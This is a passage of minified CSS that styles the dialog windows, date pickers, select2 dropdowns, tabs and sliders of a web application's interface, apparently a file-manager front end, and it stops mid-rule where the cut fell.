.dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in 